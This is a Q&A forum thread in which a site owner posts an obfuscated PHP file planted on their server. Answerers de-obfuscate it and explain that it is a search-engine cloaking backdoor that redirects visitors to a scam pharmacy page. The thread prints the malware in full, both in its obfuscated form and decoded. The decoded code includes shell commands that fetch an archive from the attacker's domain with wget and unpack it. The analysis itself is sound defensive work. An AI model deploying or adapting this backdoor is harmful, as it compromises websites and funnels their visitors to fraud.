# astronautic-benchmark.php" virus script

Tags: php, xss

have anyone heard about this:

astronautic-benchmark.php script was uploaded to my web site and did something there. I am curious what they did since they were not very malicious hackers and only changed my .htaccess file, beside for planting the above mentioned file. Below is the code, someone know what it does????

```
<?php $wzkaou="\x63"."\x72"."\x65"."\x61"."\x74"."e".chr(95).chr(102)."\x75"."\x6e"."\x63"."\x74"."\x69"."o"."n";$osyifa = $wzkaou('$a',strrev(';)a$(lave')); $osyifa(strrev(';))"==gCN0XCJoQD9lQCJoQD7kCbyVncjRCKsJXdj9Vei9VZnFGcfRXZnByboNWZJkQCJoQD701JJJVVfR1UFVVUFJ1JbJVRWJVRT9FJA5SXnQ1UPh0XQRFVIdyWSVkVSV0UfRCQuIyLvoDc0RHai0DbyVncjRSCJkQCK0welNHbl1XCJkgCNsDdphXZJkQCJoQD7ciPs1Gdo9CP+kHZvJ2L8cCIvh2YllQCJkgCNsjIuxlIg4CIn4zczVmckRWYvwDM4ACdy9GUgcCIuASXnQ1UPh0XQRFVIdyWSVkVSV0UfRCIuAyJgQXYgIXZ2JXZTByJg4CIpgibvl2cyVmdwhGcg4CIn8CUIBFInAiLg01JFJVQXRlRPN1XSVkVSV0UnslUFZlUFN1XkAiLgciPzNXZyRGZhxzJg8GajVWCJkQCK0wOi4GXiAiLgciPyhGPnAyboNWZJkQCJoQD7IibcJCIuAyJ+A3L84iclZnclNHIzlGa0BibvBCZuV3bmBCdv5GIzF2dgcCIuASXnkkUV9FVTVUVRVkUnslUFZlUFN1XkAiLgcCIMJVVgQWZ0NXZ1FXZyBSZoRlPwxzJg8GajVWCJkQCK0wOi4GXiAiLgciPxg2L8Qmb19mRgQ3bO5TMoxzJg8GajVWCJkQCK0wOi4GXiAiLgciP5R2bixjPkFWZo9CPnAyboNWZJkQCJoQD7IibcJCIuAyJ+UGb0lGdvwDZuV3bGBCdv5EI0ADN+UGb0lGd8cCIvh2YllQCJkgCNsjIuxlIg4CIn4DZhVGa84DbtRHa8cCIvh2YllQCJkgCNsjIuxlIg4CIn4jIOV0LvAjLyACTNRFSgQEVE9yLGRVRJ9yLtICIDlETCVFUgwUTUhEIFBVWUN0TEFCPnAyboNWZJkQCJoQD7kiIk5WdvZEI09mTgQDM0AiIg4CIddCTPN0TU9kUQ9lUFZlUFN1JbJVRWJVRT9FJoIXZkFWZolQCJkgCNoQD9tDdphXZ7kSXiQlTFdUQfJVRTV1XQRFVIJyWSVkVSV0UfRCQs0lISRERB9VRU9UTFJlIbJVRWJVRT9FJuISPyRGZhZiIugnc1VDZtRiLi0TdmIiL0N3boVDZtRiLi0DZmIiLpsWbkgSZk92YuVGbyV3dhJnLi0zatZiIus2YhBHRJRiLi0Dcp9DcoBnLwx2LulWYt9GZk8yL6AHd0hmIowmc1N2X5J2XldWYw9FdldGIvh2YltHIpU2ckgCImlWCJkQCK0Qf7QXa4V2O05WZ052bjJ3bvRGJg8GajV2egkCdvJGJoAiZplQCJkgCNsTM9U2ckkSKdBiISVkUFZURS9FUURFSislUFZlUFN1XkAEIsISaj02bj5CXu9Gb5JWYixXbvNmLcVmZhNWek5WYoxXbvNmLch2YyFWZzJWZ3lXb812bj5CX392d8RXZu5CXyVGdyFGajxXbvNmLcRXa1RmbvNGfv9GahlHfoNmchV2c8FGdzlmdhRHbhxXbvNmLcx2bhxXbvNmLct2chxXbvNmLc52ctxXbvNmLcdmbpJGflx2Zv92ZjICKoNGdh12XnVmcwhCImlWCJkQCK0wOx0TZslmYv1GJpkSXgICVOV0RB9lUFNVVfBFVUhkIbJVRWJVRT9FJABCLik2Ip5WatxXai9Wb8BHZp1GfwF2d8VmbvhGc8VGbpJ2btxHM2MXZpJXZzxHZhBXa8VmbvhGcpxnbhlmYtl3c8RWavJHZuF2IigCajRXYt91ZlJHcoAiZplQCJkgCNsTM9Q3biRSKp0FIiQlTFdUQfJVRTV1XQRFVIJyWSVkVSV0UfRCQgwiIpNiclRWawNXdklWYixnclx2dhJ3Y8VncuwFbpFWb8dXZpZXZyBHIiV2dgUGbn92bnx3bvhWY5xHdvJGfyVGZpB3c8VGbpJ2bN1CdvJWZsd2bvdEfzJXZuRnchBXYpRWZNxXZsd2bvdUL09mQzRWQ8JXZsdXYyNWLhN3Z8VGbn92bnNiIog2Y0FWbfdWZyBHKgYWaJkQCJoQD7ATPlxWai9WbkkQCJkgCNsDM9U2ckkQCJkgCNsDM9Q3biRSCJkQCK0wOpkSK4JXdjRCKzRnblRnbvN2X0V2ZfVGbpZGQoUGZvNWZk9FN2U2chJGQsICf8xnIoUGZvxGc4VGQ9kCduVGdu92Yy92bkRCLr1GJss2YhBHRJRCK0NXasBUCJkQCK0wepkCeyV3Ykgyc0NXa4V2XlxWamBEKgYWaJkQCK0wO4JXd1QWbk4icpR2Yk0DeyV3YkkQCJoQD7V2csVWfJkgCN0XCJkgCNsDdphXZ7IibcNyIjQURLJ1TXNyIjICIvh2YllQCJkgCNsXKiMjI90DekgCImlWCJkgCN0XCJkgCNsDdphXZJkQCJoQD7kCZtNGJoMWZ4V2XsxWZoNHIvh2YllQCJkgCNsjI6dGduEDImJXLg0mcgsjenRnLxAiZ6hXLgIXY0ByO6dGduEDIP1CI6dGduQ3cvhWNk1GJvMmch9Cc39Cc0V3bv4Wah12bkRyLvoDc0RHagQXZndHI7gGdhBHctRHJgQ2Yi0DZtNGJJkQCJoQD9lQCJkgCNsTKk12YkgyYlhXZfxGblh2cg8GajVWCJkQCJoQD7ICdz9Ga1QWbk4CImJXLg0mcgsDa0FGcw1GdkACZjJSPk12YkkQCJkQCK0wepIiMi0TP4RCKgYWaJkQCJoQD7IibcNyIjMVRMlkRfdkTJRVQEBVVjMyIiAyboNWZJkQCJoQD7lSKiQjI90DekgCf8liIyISP9gHJogCImlWCJkgCNoQD74mc1RXZylyczFGc1QWbk0TIwRCKgYWaJkQCK0wOpkSXiAnIbR1UPB1XkAEKlR2bjVGZfRjNlNXYihSNk1WPwRSCJkgCNsXKiISPhgHJoAiZplQCK0gCNsTKiEjSuxEa0dFTv5EWh1WM5FmIoUGZvNWZk9FN2U2chJWPulWYt9GZkkQCK0QCJoQDK0QCJoQD7IyLi4Cdz9Ga1QWbk4iIu8iIugGdhBHctRHJ9IXakNGJJkgCNoQD9tTKp81XFxUSG91XoUWbh5mcpRGKg0DIoRXYwBXb0RyegU2csVGI9tTKoIXak9FctVGdfRXZn91c5NHI9ACa0FGcw1GdksHIpkyJylGZfBXblR3X0V2ZfNXezdCKzR3cphXZf52bpR3YuVnZoAiZplQCK0gCNsTK4JXdkgSNk1WP4JXd1QWbkkQCK0wOpJXdk4Cdz9Gak0DeyVHJJkgCNsTK0N3boRCK1QWb9Q3cvhWNk1GJJkgCNsTK0N3boRCLiICLi4yd3dnIoU2YhxGclJ3XyR3c9Q3cvhGJJkgCNsTXikkUV9FVTVUVRVkUislUFZlUFN1XkAUPpJXdkkQCK0wOdJCVT9ESfBFVUhkIbJVRWJVRT9FJA1Ddz9GakkQCK0gCNsjIiNDNlZWYwITNxU2YzgTMhBjZhBjM4IDOxAzN1QTZ1UmI9M3chBXNk1GJJkgCNsTXis2Ylh2YfBHcwBnIbR1UPB1XkAUP4RSCJoQD7IiI9QnblRnbvNmcv9GZkkQCK0gCN0nCNsDdsV3clJHJg4mc1RXZylQCK0wOpg2YkgSZz9Gbj9FbyV3YJkgCNsTKoNGJoAyYlhXZfxmc1NGI9ACdsV3clJHJJkgCNsTK05WZnFmclNXdkACLU5URHFkUFNVVfRFUPxkUVNEIsg2YkgCI0B3b0V2cfxmc1NWCJoQD7kCMgwCVT9ESZZUSSVkVfx0UT9FVQ9ETSV1QgwCajRCKgQHcvRXZz9FbyV3YJkgCNsTKwACLSVURQllRJJVRW9FTTN1XUB1TMJVVDBCLoNGJoACdw9GdlN3XsJXdjlQCK0wOpAzMgwCVV9URNlEVfRFUPxkUVNEIsg2YkgCI0B3b0V2cfxmc1NWCJoQD7kSMgwiUFZ0UOFkUU5kUVRVRS9FVQ9ETSV1QgwCajRCKgQHcvRXZz9FbyV3YJkgCNsTKsJXdkwCTSV1XUB1TMJVVDBCLoNGJoACdw9GdlN3XsJXdjlQCK0wOpgCI0lmbp9FbyV3Yg0DIoNGJJkgCNsXKiYzMuczM18SayFmZhNFIxMTMucDN4EjLw4CNz8SZt9mcoNEIp82ajV2RgU2apxGIswUTUh0SoAiNz4yNzUzL0l2SiV2VlxGcwFEIpQjNX90VgsTMuYDIU5EIzd3bk5WaXhCIw4SNvEGbslmev1kI9QnbldWYyV2c1RCLsJXdkgCbyV3YflnYfV2ZhB3X0V2Zg42bpR3YuVnZK0gCNsTKwgCdp1Was9VZtlGdfRXZzpQD"(edoced_46esab(lave'));?>
```

Comment: Try working through the logic and find out for yourself.

Comment: It is probably a general error on GoDaddy side. Maybe you can open up a support ticket and ask them. 

You can see a similar thread on security.stackexchange.


http://security.stackexchange.com/questions/90085/godaddy-website-hacked-via-php

Comment: It is funny people downvoting this meanwhile this site is exactly for this: to discuss code. It allows the smart ones to shine and not-so smart to get their answers and learn :) Or maybe its just the hackers who write things like that do not want others to know how they do it?

Answer (score 8, accepted):

The first line we have:

```
$wzkaou="\x63"."\x72"."\x65"."\x61"."\x74"."e".chr(95).chr(102)."\x75"."\x6e"."\x63"."\x74"."\x69"."o"."n";
```

So we can figure out what this does here:

```
echo $wzkaou; // outputs create_function
```

The next line we have:

```
$osyifa = $wzkaou('$a',strrev(';)a$(lave'));
```

Since we know that $wzkaou is `'create_function'`, this is the function being called here. The first parameter is `'$a'` and the second parameter is:

```
echo strrev(';)a$(lave'); // eval($a);
```

So basically we are executing:

```
create_function('$a', 'eval($a)');
```

The argument that gets passed to this function can likewise be determined like this:

```
echo strrev(';))"==gCN0XCJoQD9lQCJo[...]dp1Was9VZtlGdfRXZzpQD"(edoced_46esab(lave');
```

And this outputs:

```
eval(base64_decode("DQpzZXRfdGltZ[...]JCQl9DQoJCX0NCg=="));
```

Finally, when we `base64_decode()` this, it produces:

```
set_time_limit(0);

function get_page_by_curl($url,$useragent="Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.131 Safari/537.36"){
        $ch = curl_init ();
        curl_setopt ($ch, CURLOPT_URL,$url);
        curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt ($ch, CURLOPT_TIMEOUT, 30);
        curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
        curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
        curl_setopt ($ch, CURLOPT_USERAGENT, $useragent);
        $result = curl_exec ($ch);
        curl_close($ch);
        return $result;
}

        $doorcontent="";
        $x=@$_POST["pppp_check"];
        $md5pass="e5e4570182820af0a183ce1520afe43b";

        $host=@$_SERVER["HTTP_HOST"];
        $uri=@$_SERVER["REQUEST_URI"];
        $host=str_replace("www.","",$host);
        $md5host=md5($host);
        $urx=$host.$uri;
        $md5urx=md5($urx);

        if (function_exists('sys_get_temp_dir')) {$tmppath = sys_get_temp_dir();} else {$tmppath = (dirname(__FILE__));}

        $cdir=$tmppath."/.".$md5host."/";



        $domain=base64_decode("ay1maXNoLWthLnJ1");

        if ($x!=""){
            $p=md5(base64_decode(@$_POST["p"]));
            if ($p!=$md5pass)return;

            if (($x=="2")||($x=="4")){
                echo "###UPDATING_FILES###\n";
                if ($x=="2"){
                    $cmd="cd $tmppath; rm -rf .$md5host";
                    echo shell_exec($cmd);
                }
                $cmd="cd $tmppath; wget http://$domain/outp/wp/arc/$md5host.tgz -O 1.tgz; tar -xzf 1.tgz; rm -rf 1.tgz";
                echo shell_exec($cmd);
                exit;
            }
            if ($x=="3"){
                echo "###WORKED###\n";exit;
            }
        }else{
            $curx=$cdir.$md5urx;
            if (@file_exists($curx)){
                @list($IDpack,$mk,$doorcontent)=@explode("|||",@base64_decode(@file_get_contents($curx)));
                $bot=0;
                $se=0;
                $mobile=0;
                if (preg_match("#google|gsa-crawler|AdsBot-Google|Mediapartners|Googlebot-Mobile|spider|bot|yahoo|google web preview|mail\.ru|crawler|baiduspider#i", @$_SERVER["HTTP_USER_AGENT" ]))$bot=1;
                if (preg_match("#android|symbian|iphone|ipad|series60|mobile|phone|wap|midp|mobi|mini#i", @$_SERVER["HTTP_USER_AGENT" ]))$mobile=1;
                if (preg_match("#google|bing\.com|msn\.com|ask\.com|aol\.com|altavista|search|yahoo|conduit\.com|charter\.net|wow\.com|mywebsearch\.com|handycafe\.com|babylon\.com#i", @$_SERVER["HTTP_REFERER" ]))$se=1;
                if ($bot) {echo $doorcontent;exit;}
                if ($se) {echo get_page_by_curl("http://$domain/lp.php?ip=".$IDpack."&mk=".rawurlencode($mk)."&d=".$md5host."&u=".$md5urx."&addr=".$_SERVER["REMOTE_ADDR"],@$_SERVER["HTTP_USER_AGENT"]);exit;}

                header($_SERVER['SERVER_PROTOCOL'] . " 404 Not Found");
                echo '<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">' . "\n";
                echo '<html><head>' . "\n";
                echo '<title>404 Not Found</title>' . "\n";
                echo '</head><body>' . "\n";
                echo '<h1>Not Found</h1>' . "\n";
                echo '<p>The requested URL ' . $_SERVER['REQUEST_URI'] . ' was not found on this server.</p>' . "\n";
                echo '<hr>' . "\n";
                echo '<address>' . $_SERVER['SERVER_SOFTWARE'] . ' PHP/' . phpversion() . ' Server at ' . $_SERVER['HTTP_HOST'] . ' Port 80</address>' . "\n";
                echo '</body></html>';
                exit;
            }else{
                $crurl="http://".@$_SERVER['HTTP_HOST'].@$_SERVER['REQUEST_URI'];
                echo get_page_by_curl($crurl);
            }
        }
```

Comment: Wow... Mike, I did not think someone will put so much work into investigating this. Impressive! Basically, this is a url hijacking script, like I suspected.

Answer (score 5):

As Mike has pointed out, the code you have is a poorly obfuscated (uses base 64 string encoding and reversing strings/hexadecimal methods to hide it, which are easy to decode) script. It is possible these methods were used to only keep the script intact (as a plain text string has a high posibility of being mangled - the base 64 encoding protects from this).

Looking at the decoded version, it would appear it is a script to load the webpage at k-fish-ka.ru/lp.php instead of your page when a regular user loads your page from a search engine result. Directly navigating to your page will not load the fake site instead of yours, so you will not notice the difference unless you find your page on a search engine result (or forge the http header to say you were reffered from google.com to test). This is probably why they only inject the page on search engine hits, as to hide it from the site creator who usually directly accesses the website.

The page that is being injected itself is a scam online pharmacy page (I wouldn't recommend visiting the source page as it could be a scam, but that is what's there). The page seems to be a direct copy/paste from another website www.maximumstoretabs.com (which is quite possibly a scam itself), as can be seen by the copyright message at the bottom of the page.

Answer (score 1):

This script among other things downloads a compressed file, which ostensibly contains other malware or really anything the scammers want. In my case there was a php mailer (probably for spamming) and tons of base64 encoded emails with horrible things in them saved to path indicated by the `$curx=$cdir.$md5urx;`

This very same thing happened to a site that I manage. The SEF ( Search Engine Friendly ) Joomla links stopped working. Since they require URL rewriting.